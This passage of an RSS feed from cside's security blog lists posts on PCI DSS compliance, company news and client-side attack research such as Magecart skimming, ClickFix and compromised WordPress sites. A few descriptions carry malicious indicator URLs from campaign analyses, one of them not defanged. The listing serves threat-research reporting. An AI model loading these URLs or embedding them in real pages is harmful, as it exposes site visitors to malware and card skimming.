00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/cside-aws-partnership.webp" length="0" type="image/webp"/></item><item><title>What QSAs Should Look For When Assessing PCI 6.4.3 and 11.6.1</title><link>https://cside.com/blog/qsa-guide-for-6-4-3-and-11-6-1</link><guid isPermaLink="true">https://cside.com/blog/qsa-guide-for-6-4-3-and-11-6-1</guid><description>We put together a shorthand checklist, red flags to look for, and the compliance differences between CSP, Crawlers, and Client-side scripts.</description><pubDate>Tue, 09 Sep 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cover-of-this-article-in-black-and-blue-background-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The Blockchain Is Not Your Friend: Examining EtherHiding and using Blockchain for Attacks</title><link>https://cside.com/blog/examining-etherhiding-and-blockchain-for-attacks</link><guid isPermaLink="true">https://cside.com/blog/examining-etherhiding-and-blockchain-for-attacks</guid><description>In March/April of 2025 a ClickFix variant was going around that used the Binance blockchain with smart contracts to control malware payloads that would surface from a hacked WordPress plugin.</description><pubDate>Tue, 02 Sep 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Jack LaFond</author><enclosure url="https://cside.com/content/images/2025/12/Examining-EtherHiding-and-Blockchain-for-attacks.webp" length="0" type="image/webp"/></item><item><title>Deobfuscating Third-Party JavaScript Code | A Security Engineer&apos;s Guide</title><link>https://cside.com/blog/how-to-deobfuscate-third-party-javascript-code</link><guid isPermaLink="true">https://cside.com/blog/how-to-deobfuscate-third-party-javascript-code</guid><description>From a security perspective, a third-party script with obfuscated code is a massive red flag. This guide explores methods to deobfuscate JavaScript and how to spot common attacks.</description><pubDate>Thu, 28 Aug 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Jack LaFond</author><enclosure url="https://cside.com/content/images/2025/12/cover-image---cside-guide-to-analyzing-and-deobfuscating-third-party-javascript--1-.webp" length="0" type="image/webp"/></item><item><title>How to comply with PCI 6.4.3 and 11.6.1 | Practical guide for security teams</title><link>https://cside.com/blog/how-to-comply-with-pci-6-4-3</link><guid isPermaLink="true">https://cside.com/blog/how-to-comply-with-pci-6-4-3</guid><description>A practical guide to PCI 6.4.3 for security teams in eCommerce, FinTech, and SaaS. Learn why CSP or Crawlers are not enough to protect your users.</description><pubDate>Tue, 19 Aug 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/blog-cover-how-to-comply-with-pci-643-and-pci-11-6-1.webp" length="0" type="image/webp"/></item><item><title>Cosmic Ray Bit Flips and the Hidden Risk at Scale</title><link>https://cside.com/blog/cosmic-ray-bit-flips-and-the-hidden-risk-at-scale</link><guid isPermaLink="true">https://cside.com/blog/cosmic-ray-bit-flips-and-the-hidden-risk-at-scale</guid><description>When a 1 in a million rare occurrence, turns out not to be so rare. How our atmosphere changes zero to ones and how it can impact security.</description><pubDate>Fri, 08 Aug 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Jack LaFond</author><enclosure url="https://cside.com/content/images/2025/12/blog-cover-cosmic-ray-bit-flips.webp" length="0" type="image/webp"/></item><item><title>Client-Side Attack Report Q2 2025</title><link>https://cside.com/blog/client-side-attack-report-q2-2025</link><guid isPermaLink="true">https://cside.com/blog/client-side-attack-report-q2-2025</guid><description>cside’s research uncovered over 72,000 compromised websites, revealing how attackers are relying on JavaScript-based delivery mechanisms, third-party supply chain vulnerabilities, and deceptive browser based social engineering tactics such as fake browser updates.</description><pubDate>Wed, 30 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/image-client-side-attack-report-q2-2025.webp" length="0" type="image/webp"/></item><item><title>The PII Blind Spot in Web Security</title><link>https://cside.com/blog/the-pii-blind-spot-in-web-security</link><guid isPermaLink="true">https://cside.com/blog/the-pii-blind-spot-in-web-security</guid><description>But PII moves through the frontend, where controls are weaker and visibility is often limited.</description><pubDate>Wed, 30 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/blog-cover-the-pii-blind-spot.webp" length="0" type="image/webp"/></item><item><title>UK Internet Age Verification System explained for cyber security</title><link>https://cside.com/blog/uk-internet-age-verification-system-explained-for-cyber-security</link><guid isPermaLink="true">https://cside.com/blog/uk-internet-age-verification-system-explained-for-cyber-security</guid><description>The goal of the UK Internet Age Verification System is to protect children browsing on the internet. But these checks come with new cybersecurity risks and privacy concerns.</description><pubDate>Tue, 29 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/UK-Internet-Age-Verification-Blog-Banner.webp" length="0" type="image/webp"/></item><item><title>cside at PCI SSC 2025 North America Community Meeting</title><link>https://cside.com/blog/cside-at-pci-ssc-2025-north-america-community-meeting</link><guid isPermaLink="true">https://cside.com/blog/cside-at-pci-ssc-2025-north-america-community-meeting</guid><description>We are in town for the PCI SSC 2025 North America Community Meeting, September 16th to 18th.</description><pubDate>Thu, 24 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/07/Frame-289155.jpg" length="0" type="image/jpeg"/></item><item><title>How Chrome extensions can remove security headers</title><link>https://cside.com/blog/how-chrome-extensions-can-remove-security-headers</link><guid isPermaLink="true">https://cside.com/blog/how-chrome-extensions-can-remove-security-headers</guid><description>Many browsers actively update extensions without specific approval or opt-in. This means that an extension today can behave wildly differently tomorrow, and you will not be made aware of it.</description><pubDate>Mon, 21 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/title-of-this-article-on-black-and-blue-background.webp" length="0" type="image/webp"/></item><item><title>What&apos;s the leading technology to prevent credit card skimming?</title><link>https://cside.com/blog/whats-the-leading-technology-to-prevent-credit-card-skimming</link><guid isPermaLink="true">https://cside.com/blog/whats-the-leading-technology-to-prevent-credit-card-skimming</guid><description>Visa’s Spring 2025 Biannual Threats Report identifies digital skimming as one of the “most prolific and consistent threats” in the payments ecosystem.</description><pubDate>Mon, 21 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/title-of-the-article-on-blue-and-black-background.webp" length="0" type="image/webp"/></item><item><title>CryptoJacking is dead: long live CryptoJacking</title><link>https://cside.com/blog/cryptojacking-is-dead-long-live-cryptojacking</link><guid isPermaLink="true">https://cside.com/blog/cryptojacking-is-dead-long-live-cryptojacking</guid><description>Modern crypto jacking has evolved into a silent, multi-stage attacks.</description><pubDate>Thu, 17 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/long-live-cryptojacking-on-black-and-blue-background.webp" length="0" type="image/webp"/></item><item><title>Magecart targeting east asian e-commerce websites on OpenCart</title><link>https://cside.com/blog/magecart-targeting-east-asian-e-commerce-websites-on-opencart</link><guid isPermaLink="true">https://cside.com/blog/magecart-targeting-east-asian-e-commerce-websites-on-opencart</guid><description>We’ve detected a magecart-style attack targeting the OpenCart CMS platform</description><pubDate>Tue, 15 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/banner-of-this-article-on-black-and-blue-background.webp" length="0" type="image/webp"/></item><item><title>How traffic hijacking and affiliate fraud can harm websites and users</title><link>https://cside.com/blog/how-traffic-hijacking-and-affiliate-fraud-can-harm-websites-and-users</link><guid isPermaLink="true">https://cside.com/blog/how-traffic-hijacking-and-affiliate-fraud-can-harm-websites-and-users</guid><description>Traffic hijacking is when someone secretly changes where a website’s links go, sending visitors to other sites.</description><pubDate>Thu, 10 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/banner-of-this-article-on-black-and-blue-background.png" length="0" type="image/png"/></item><item><title>cside at BlackHat USA 2025</title><link>https://cside.com/blog/c-side-at-blackhat-usa-2025</link><guid isPermaLink="true">https://cside.com/blog/c-side-at-blackhat-usa-2025</guid><description>cside is exhibiting at BlackHat USA 2025.</description><pubDate>Wed, 09 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/07/Frame-289133--1-.png" length="0" type="image/png"/></item><item><title>Is relying on Indicators of Compromise secure enough?</title><link>https://cside.com/blog/is-relying-on-indicators-of-compromise-secure-enough</link><guid isPermaLink="true">https://cside.com/blog/is-relying-on-indicators-of-compromise-secure-enough</guid><description>Most security programs today still rely heavily on Indicators of Compromise (IOCs). This approach fails to detect threats that evolve slowly, reuse infrastructure, or operate in narrow, high-value contexts like client-side web skimming.</description><pubDate>Thu, 03 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/banner-of-the-article-on-black-and-blue-background.webp" length="0" type="image/webp"/></item><item><title>Why crawlers can&apos;t help with PCI compliance (alone)</title><link>https://cside.com/blog/why-crawlers-cant-help-with-pci-compliance-alone</link><guid isPermaLink="true">https://cside.com/blog/why-crawlers-cant-help-with-pci-compliance-alone</guid><description>Crawlers act like a user but are very clearly not a real human user. If a malicious script would get injected because of a user interaction, the crawler will not see the malicious script unless it makes that user interaction</description><pubDate>Thu, 03 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cover-of-this-article-in-black-and-blue-background--1-.webp" length="0" type="image/webp"/></item><item><title>PCI Compliance 4.0.1: A Practical Implementation Guide Webinar</title><link>https://cside.com/blog/pci-compliance-4-0-1-a-practical-implementation-guide-webinar</link><guid isPermaLink="true">https://cside.com/blog/pci-compliance-4-0-1-a-practical-implementation-guide-webinar</guid><description>We partnered up with VikingCloud, the largest global PCI compliance QSA and security firm on 2 webinars giving you the full context and info to implement PCI DS 4.0.1. With a special focus on requirements 6.4.3 &amp; 11.6.1.</description><pubDate>Thu, 26 Jun 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/webinar-image-cover--3--converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Why We’re Called cside</title><link>https://cside.com/blog/why-were-called-c-side</link><guid isPermaLink="true">https://cside.com/blog/why-were-called-c-side</guid><description>We named ourselves after the part of the web that no one else was protecting: the client-side.</description><pubDate>Wed, 25 Jun 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-logo.webp" length="0" type="image/webp"/></item><item><title>CoinMarketCap Client-Side Attack: A Comprehensive Analysis</title><link>https://cside.com/blog/coinmarketcap-client-side-attack-a-comprehensive-analysis</link><guid isPermaLink="true">https://cside.com/blog/coinmarketcap-client-side-attack-a-comprehensive-analysis</guid><description>On June 20, 2025, CoinMarketCap (CMC) - a cornerstone of the cryptocurrency ecosystem, relied upon by millions for real-time crypto data - experienced a significant security incident.</description><pubDate>Mon, 23 Jun 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/coin-market-cap-image-cover.webp" length="0" type="image/webp"/></item><item><title>Weaponized Google OAuth Triggers Malicious WebSocket</title><link>https://cside.com/blog/weaponized-google-oauth-triggers-malicious-websocket</link><guid isPermaLink="true">https://cside.com/blog/weaponized-google-oauth-triggers-malicious-websocket</guid><description>An attacker is using ‘Google.com’ to deliver and execute their own code in a weaponized Google OAuth attack.</description><pubDate>Tue, 10 Jun 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/weaponized-google-oauth-image-cover.webp" length="0" type="image/webp"/></item><item><title>Ruthless Client-Side Attacks Targeting Multiple Platforms with ClickFix</title><link>https://cside.com/blog/ruthless-client-side-attacks-targeting-multiple-platforms-with-clickfix</link><guid isPermaLink="true">https://cside.com/blog/ruthless-client-side-attacks-targeting-multiple-platforms-with-clickfix</guid><description>In this article, we break down a recent ClickFix variant that now targets macOS, Android, and iOS, using browser-based redirections, fake UI prompts, and even drive-by download techniques.</description><pubDate>Wed, 28 May 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/clickfix-attack-image-cover.webp" length="0" type="image/webp"/></item><item><title>Chinese Adult Scam Targets Mobile Users Through PWA</title><link>https://cside.com/blog/chinese-adult-content-scam-targets-mobile-users-through-pwa-injection</link><guid isPermaLink="true">https://cside.com/blog/chinese-adult-content-scam-targets-mobile-users-through-pwa-injection</guid><description>We’ve identified a fresh injection campaign abusing third-party JavaScript to redirect users.</description><pubDate>Tue, 20 May 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/pwa-injetion-cover-image.webp" length="0" type="image/webp"/></item><item><title>Malicious North Korean actors attempt to infiltrate technology companies</title><link>https://cside.com/blog/malicious-north-korean-actors-attempting-to-infiltrate-technology-companies</link><guid isPermaLink="true">https://cside.com/blog/malicious-north-korean-actors-attempting-to-infiltrate-technology-companies</guid><description>Catching fraudulent job applicants.</description><pubDate>Thu, 01 May 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/fraudulent-job-candidates-cover-image.webp" length="0" type="image/webp"/></item><item><title>Client-Side Attack Recap – Q1 2025</title><link>https://cside.com/blog/c-side-client-side-attack-recap-q1-2025</link><guid isPermaLink="true">https://cside.com/blog/c-side-client-side-attack-recap-q1-2025</guid><description>cside’s research uncovered nearly 300,000 compromised websites in Q1 of 2025.</description><pubDate>Wed, 30 Apr 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/client-side-attack-report-image-cover.webp" length="0" type="image/webp"/></item><item><title>VikingCloud approves cside for PCI DSS requirement 6.4.3 and 11.6.1</title><link>https://cside.com/blog/vikingcloud-approves-c-sides-security-platform-for-pci-dss-v4-0-1-requirement-6-4-3-and-11-6-1</link><guid isPermaLink="true">https://cside.com/blog/vikingcloud-approves-c-sides-security-platform-for-pci-dss-v4-0-1-requirement-6-4-3-and-11-6-1</guid><description>cside has partnered with VikingCloud to perform a deep technical assessment of the security solutions we offer under the enterprise plan under the scope of PCI compliance. Offering full peace of mind that with a proper implementation of our products requirements 6.4.3 and 11.6.1 are met.</description><pubDate>Thu, 24 Apr 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-vikingcloud-partnership-cover-image.webp" length="0" type="image/webp"/></item><item><title>Is there a &quot;free&quot; method to comply with PCI DSS 6.4.3 and 11.6.1?</title><link>https://cside.com/blog/comply-with-pci-dss-6-4-3-and-11-6-1-for-free</link><guid isPermaLink="true">https://cside.com/blog/comply-with-pci-dss-6-4-3-and-11-6-1-for-free</guid><description>The short answer: Without an off the shelf solution, you&apos;d have to build a DIY monitoring tool that would cos significantly more in wages than a prebuilt solution&apos;s vendor costs.</description><pubDate>Wed, 23 Apr 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/can-you-do-it-for-free-image-cover--1--converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Do you need PCI SSF or PCI DSS? Here’s the difference</title><link>https://cside.com/blog/do-you-need-pci-ssf-or-pci-dss-heres-the-difference</link><guid isPermaLink="true">https://cside.com/blog/do-you-need-pci-ssf-or-pci-dss-heres-the-difference</guid><description>PCI SSF is for the software, and PCI DSS is for everything else. Let&apos;s dive in.</description><pubDate>Tue, 22 Apr 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/pci-ssf-image-cover--1-.webp" length="0" type="image/webp"/></item><item><title>Over 150K websites hit by full-page hijack linking to Chinese gambling sites</title><link>https://cside.com/blog/over-150k-websites-hit-by-full-page-hijack-linking-to-chinese-gambling-sites</link><guid isPermaLink="true">https://cside.com/blog/over-150k-websites-hit-by-full-page-hijack-linking-to-chinese-gambling-sites</guid><description>We estimate that approximately 150,000 websites have been impacted by this campaign. The script defines an array of keywords related to betting, gambling, and casino brands both in English and Chinese.</description><pubDate>Wed, 26 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/150k-websites-article-image-cover.webp" length="0" type="image/webp"/></item><item><title>Can you use Adyen for PCI DSS?</title><link>https://cside.com/blog/can-you-use-adyen-for-pci-dss</link><guid isPermaLink="true">https://cside.com/blog/can-you-use-adyen-for-pci-dss</guid><description>Yes, BUT depending on which on the integration, your business is still responsible for ensuring compliance with the Payment Card Industry Data Security Standard (PCI DSS).</description><pubDate>Fri, 21 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/adyen-pci-dss-image-cover.webp" length="0" type="image/webp"/></item><item><title>Can you use PayPal (Braintree) for PCI DSS?</title><link>https://cside.com/blog/can-you-use-paypal-braintree-for-pci-dss</link><guid isPermaLink="true">https://cside.com/blog/can-you-use-paypal-braintree-for-pci-dss</guid><description>Yes, BUT depending on which on the integration, your business is still responsible for ensuring compliance with the Payment Card Industry Data Security Standard (PCI DSS).</description><pubDate>Fri, 21 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/03/pci-compliant-paypal-how-cside.dev.webp" length="0" type="image/webp"/></item><item><title>Can you use Stripe for PCI DSS?</title><link>https://cside.com/blog/can-you-use-stripe-for-pci-dss</link><guid isPermaLink="true">https://cside.com/blog/can-you-use-stripe-for-pci-dss</guid><description>Yes, BUT depending on which on the integration, your business is still responsible for ensuring compliance with the Payment Card Industry Data Security Standard (PCI DSS).</description><pubDate>Fri, 21 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/03/pci-compliant-stripe-how-cside.dev.webp" length="0" type="image/webp"/></item><item><title>BSidesSF and RSAC Event</title><link>https://cside.com/blog/bsides-and-rsac-afterparties</link><guid isPermaLink="true">https://cside.com/blog/bsides-and-rsac-afterparties</guid><description>When cside is exhibiting, the afterparties are in town! Organized by us, Socket, Arcjet and Incident! Find our booth at BSidesSF (follow the laser), and booth 2438 at RSAC. Register for the 30th of April Book a meeting Join us for the ultimate cybersecurity networking experience at the Rooftop of our investor Uncork Capital in San Francisco! Organized by cside, Socket, Arcjet, and Incident, these exclusive events bring together 250+ techies, cybersecurity professionals, and BS</description><pubDate>Thu, 13 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/03/bsides-rsac-afterparties-cside.dev.webp" length="0" type="image/webp"/></item><item><title>How to be a PCI DSS SAQ A company (6.4.3 and 11.6.1)</title><link>https://cside.com/blog/how-to-be-a-pci-dss-saq-a-company</link><guid isPermaLink="true">https://cside.com/blog/how-to-be-a-pci-dss-saq-a-company</guid><description>One sentence sparks debate. Because sites load scripts dynamically, a script from any page can persist into checkout, potentially interfering with payments. Third-party scripts, even if unrelated or on pages loaded before the payment pages, can introduce vulnerabilities.</description><pubDate>Fri, 07 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/how-to-be-a-pci-dss-image-cover.webp" length="0" type="image/webp"/></item><item><title>Thousands of websites hit by four backdoors in 3rd party JavaScript attack</title><link>https://cside.com/blog/thousands-of-websites-hit-by-four-backdoors-in-3rd-party-javascript-attack</link><guid isPermaLink="true">https://cside.com/blog/thousands-of-websites-hit-by-four-backdoors-in-3rd-party-javascript-attack</guid><description>While analyzing threats targeting WordPress frameworks, we found an attack where a single 3rd party JavaScript file was used to inject four separate backdoors into 1,000 compromised websites using cdn.csyndication[.]com/.</description><pubDate>Tue, 04 Mar 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/4-backdoors-image-cover.webp" length="0" type="image/webp"/></item><item><title>Bybit Attack: $1.5B stolen through malicious JavaScript</title><link>https://cside.com/blog/bybit-attack-1-5b-stolen-through-malicious-javascript</link><guid isPermaLink="true">https://cside.com/blog/bybit-attack-1-5b-stolen-through-malicious-javascript</guid><description>The attackers injected malicious JavaScript into the website interface where Bybit’s employees normally approve transactions. This malicious code was hidden in such a way that everything looked normal on the screen—but behind the scenes, it changed important details.</description><pubDate>Thu, 27 Feb 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/1.5-billion-stolen-image-cover.webp" length="0" type="image/webp"/></item><item><title>Over 35,000 Websites Targeted in Full-Page Hijack Linking to a Chinese-Language Gambling Scam</title><link>https://cside.com/blog/over-35-000-websites-targeted-in-full-page-hijack-linking-to-a-chinese-language-gambling-scam</link><guid isPermaLink="true">https://cside.com/blog/over-35-000-websites-targeted-in-full-page-hijack-linking-to-a-chinese-language-gambling-scam</guid><description>A new malware campaign has compromised 35,000+ websites, injecting a malicious script from the websites listed below. Once the script loads, it fully hijacks the user’s browser window—often redirecting them to pages promoting a Chinese-language gambling (or casino) platform.</description><pubDate>Thu, 20 Feb 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/35000-sites-attacked-image-cover.webp" length="0" type="image/webp"/></item><item><title>cside is now SOC2 compliant</title><link>https://cside.com/blog/c-side-is-now-soc2-compliant</link><guid isPermaLink="true">https://cside.com/blog/c-side-is-now-soc2-compliant</guid><description>We’re proud to announce our SOC2 type 2 audit has passed and we passed with the highest degree of approval.</description><pubDate>Wed, 05 Feb 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-soc2-compliant-image-cover.webp" length="0" type="image/webp"/></item><item><title>Demystifying the January 2025 updates to PCI DSS SAQ A</title><link>https://cside.com/blog/demystifying-the-january-2025-updates-to-pci-dss-saq-a</link><guid isPermaLink="true">https://cside.com/blog/demystifying-the-january-2025-updates-to-pci-dss-saq-a</guid><description>A full detailed explanation, chart and guide to the changes regarding PCI DSS 4.0.1 - 6.4.3 and 11.6.1</description><pubDate>Sun, 02 Feb 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/do-you-need-to-comply-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>10,000 WordPress Websites Found Delivering MacOS and Windows Malware</title><link>https://cside.com/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware</link><guid isPermaLink="true">https://cside.com/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware</guid><description>We identified over 10,000 WordPress loading showing fake Google browser update leading to malware downloads.</description><pubDate>Mon, 27 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/10000-wordpress-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Government and university websites targeted in ScriptAPI[.]dev client-side attack</title><link>https://cside.com/blog/government-and-university-websites-targeted-in-scriptapi-dev-client-side-attack</link><guid isPermaLink="true">https://cside.com/blog/government-and-university-websites-targeted-in-scriptapi-dev-client-side-attack</guid><description>Yesterday we discovered another client-side JavaScript attack targeting +500 websites, including governments and universities. The injected scripts create hidden links in the Document Object Model (DOM), pointing to external websites, a programming interface for web documents.</description><pubDate>Tue, 21 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/new-client-side-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Affiliate tracking and its cyber security risks</title><link>https://cside.com/blog/affiliate-tracking-and-its-cyber-security-risks</link><guid isPermaLink="true">https://cside.com/blog/affiliate-tracking-and-its-cyber-security-risks</guid><description>Malicious actors often exploit tracking pixels to inject harmful scripts on otherwise normal websites.</description><pubDate>Mon, 20 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/affiliate-tracking-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The cost of false positives - how we became a target</title><link>https://cside.com/blog/the-cost-of-false-positives</link><guid isPermaLink="true">https://cside.com/blog/the-cost-of-false-positives</guid><description>This week, we identified an intriguing use case involving the WP3[.]XYZ attack (link to our blog post). It sparked interest across the community and led to better detection rates on platforms like VirusTotal (VirusTotal link). While most appreciated our efforts, others criticized us for not identifying the root cause or recommending services to clean up hacked websites. Despite this, we aim to make the community aware of potential attacks and promise to do even better in the future. When fals</description><pubDate>Fri, 17 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/how-we-became-a-target-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Over 5,000 WordPress sites caught in WP3[.]XYZ malware attack</title><link>https://cside.com/blog/over-5k-wordpress-sites-caught-in-wp3xyz-malware-attack</link><guid isPermaLink="true">https://cside.com/blog/over-5k-wordpress-sites-caught-in-wp3xyz-malware-attack</guid><description>We’ve uncovered a widespread malware campaign targeting WordPress websites, affecting over 5,000 sites globally. The malicious domain: &quot;https://wp3.xyz/plugin[.]php&quot;.</description><pubDate>Mon, 13 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/new-malware-attack-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Why Content Security Policy doesn&apos;t work</title><link>https://cside.com/blog/why-csp-doesnt-work</link><guid isPermaLink="true">https://cside.com/blog/why-csp-doesnt-work</guid><description>Content Security Policy (CSP) is a security feature provided by web browsers that a website owner can use to define a set of rules that control which resources (e.g., scripts, styles, images) can be loaded and executed by the browser. We call this the client-side, which is at the very end of the web supply chain. When properly configured, it helps prevent a wide range of attacks. But those first three words make all the difference. It can help prevent: Cross-Site Scripting (XSS): By restricti</description><pubDate>Tue, 07 Jan 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/why-csps-are-not-enough-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>Ad marketplaces security and compliance risks</title><link>https://cside.com/blog/ad-marketplaces-security-and-compliance-risks</link><guid isPermaLink="true">https://cside.com/blog/ad-marketplaces-security-and-compliance-risks</guid><description>For businesses monetizing through ad marketplace models, the less traditional 3rd-party advertising networks, analytics platforms, and marketing scripts are indispensable. They’re needed to drive revenue by boosting engagement and tracking user behavior.</description><pubDate>Mon, 23 Dec 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/ad-marketplaces-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>A new Progressive Web App danger very few know about</title><link>https://cside.com/blog/a-new-progressive-web-app-danger-very-few-know-about</link><guid isPermaLink="true">https://cside.com/blog/a-new-progressive-web-app-danger-very-few-know-about</guid><description>The rise in adoption with PWAs comes an increase in client-side security risks. And the industry? It’s barely talking about it.</description><pubDate>Fri, 20 Dec 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/new-pwa-danger-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The Polyfill[.]io attack - More than just a redirect attack</title><link>https://cside.com/blog/polyfill-more-than-just-a-redirect-attack</link><guid isPermaLink="true">https://cside.com/blog/polyfill-more-than-just-a-redirect-attack</guid><description>A redirect was only what was caught. With control of one third-party script on half a million sites, far worse was possible. Here is why it mattered.</description><pubDate>Fri, 06 Dec 2024 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/life-changing-sum-of-money-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>New 3rd party JS script attack found: Artifyau[.]com and Quantifymy[.]com</title><link>https://cside.com/blog/new-3rd-party-js-script-attack-found-artifyaucom-and-quantifymycom</link><guid isPermaLink="true">https://cside.com/blog/new-3rd-party-js-script-attack-found-artifyaucom-and-quantifymycom</guid><description>This week, we deployed a specialized crawler for research purposes. Within just 24 hours, it successfully identified new Magecart attack patterns. Magecart is a sophisticated, financially motivated threat that injects malicious JavaScript to steal personal payment information. Here&apos;s a list of the biggest Magecart attacks thus far. Initial Detection: Obfuscated JavaScript on Artifyau[.]com Detected URL: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. The URL mimics a</description><pubDate>Mon, 04 Nov 2024 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure url="https://cside.com/content/images/2025/12/artif-and-quantifymy-image-cover-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>New Magecart attack code revealed</title><link>https://cside.com/blog/new-magecart-attack-code-revealed</link><guid 